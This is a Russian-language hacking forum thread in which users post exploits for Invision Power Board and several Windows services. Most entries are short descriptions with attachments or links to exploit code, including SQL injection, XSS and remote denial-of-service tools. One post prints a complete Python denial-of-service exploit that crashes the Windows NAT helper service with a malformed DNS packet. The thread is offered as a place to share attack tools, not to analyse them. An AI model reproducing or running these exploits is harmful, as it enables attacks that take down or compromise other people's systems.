( Вход | Регистрация | Поиск )

Exploits, Постим эксплойты
Дата обновления: 30.09.2009 - 06:52, перейти к новому сообщению

·de1ay
Группа: Наши Люди

Сообщений: 4.437
Тема создана для того, что-бы закидывать сюда исходники свежих сплойтов!
Никаких обсуждений в данной теме не ведём! Только описание сплойта, линк с исходниками или исходники,

Межсайтовый скриптинг и SQL-инъекция в Invision Power Board (2.0.0 - 2.1.4)

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных в файлах куки. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.

2. Уязвимость существует из-за недостаточной обработки входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Сплойт:

» Exploit «



Ответов(10 - 19)

·yah
Группа: Наши Люди

Сообщений: 2.336
RPC Exploit GUI v2





·de1ay
Группа: Наши Люди

Сообщений: 4.437
Отказ в обслуживании в Microsoft Windows XP,2003

Сплойт:
аттач wink.gif





·snike
Группа: Пользователи

Сообщений: 96
Появился эксплойт для DOS-атаки на форум IPB 2.1.х (до 2.1.7). Написан на Перле. Работает на всех версиях MySQL, для успешной работы требует magic_quotes_gpc = 0. Эксплуатирует уязвимость с CLIENT_IP (от 8.06.2006).
Использование очень простое и стандартное:
[путь к перлу] [путь к эксплойту] www.site.com /ipb/


» Нажмите, для открытия спойлера «



·de1ay
Группа: Наши Люди

Сообщений: 4.437
Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit
Описание:
сплойт вешает тачку без установленного апдейта smile.gif

» exploit code here «

говорим спасибо кодеру cocoruder(frankruder_at_hotmail.com)


·de1ay
Группа: Наши Люди

Сообщений: 4.437
И ещё один сплойт бьющий на отказ Microsoft Windows 2000 SP0-SP4, Microsoft Windows XP SP0-SP1, Microsoft Windows NT 4.0 smile.gif

MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040)

» sources here «

Скомпиленный здесь:



·Jon-dog
Группа: Пользователи

Сообщений: 235
Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit

Posted by iLLuZionist user posted image

Respect!

Compeled Version:



·Jon-dog
Группа: Пользователи

Сообщений: 235
IGMP v3 DoS Exploit


Эфект тот же что и от EvilIGMP, только консольный вариант + исходник rolleyes.gif


_http://www.stargate-net.ru/1/IGMP.C

З.Ы. ригистр в ссылке обязателен



Добавлено:

Ну и чуть не забыл tongue.gif Откомпиленая версия:




·Jon-dog
Группа: Пользователи

Сообщений: 235
MS04-007-dos


Posted by Raider_Singer user posted image

На удаленной системе должен быть открытым 445 порт smile.gif

XP-SP0, SP-1, 2k, 2003




·de1ay
Группа: Наши Люди

Сообщений: 4.437
Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
Очередной сплойт для проведения ДоС атаки... КПД на 0, зато нервы успокаивает smile.gif

#!/usr/bin/python
# Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
# Bug discovered by h07
# Tested on XP SP2 Polish
# Details:
#
# Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]
#
# [Process svchost.exe, module ipnathlp]
# --> MOV DL, [EAX]
# Exception C0000005 (ACCESS_VIOLATION reading [00000000])
##

from socket import *
from time import sleep

host = "192.168.0.1"
port = 53

buffer = ( # DNS (query)
"\x6c\xb6" # Transaction ID: 0x6cb6
"\x01\x00" # Flags: 0x0100 (Standard query)
"\x00\x00" # Questions: 0
"\x00\x00" # Answer RRs: 0
"\x00\x00" # Authority RRs: 0
"\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0)
"\x03\x77\x77\x77" #
"\x06\x67\x6f\x6f" #
"\x67\x6c\x65\x03" #
"\x63\x6f\x6d\x00" # Name: www.google.com
"\x00\x01" # Type: A (Host address)
"\x00\x01" # Class: IN (0x0001)
)

s = socket(AF_INET, SOCK_DGRAM)
s.connect((host, port))
s.send(buffer)
sleep(1)
s.close()

# EoF



·de1ay
Группа: Наши Люди

Сообщений: 4.437
QUOTE
Jon-dog плз перезалей

Аттач smile.gif
Пароль на архив:
SoftoRooM.NeT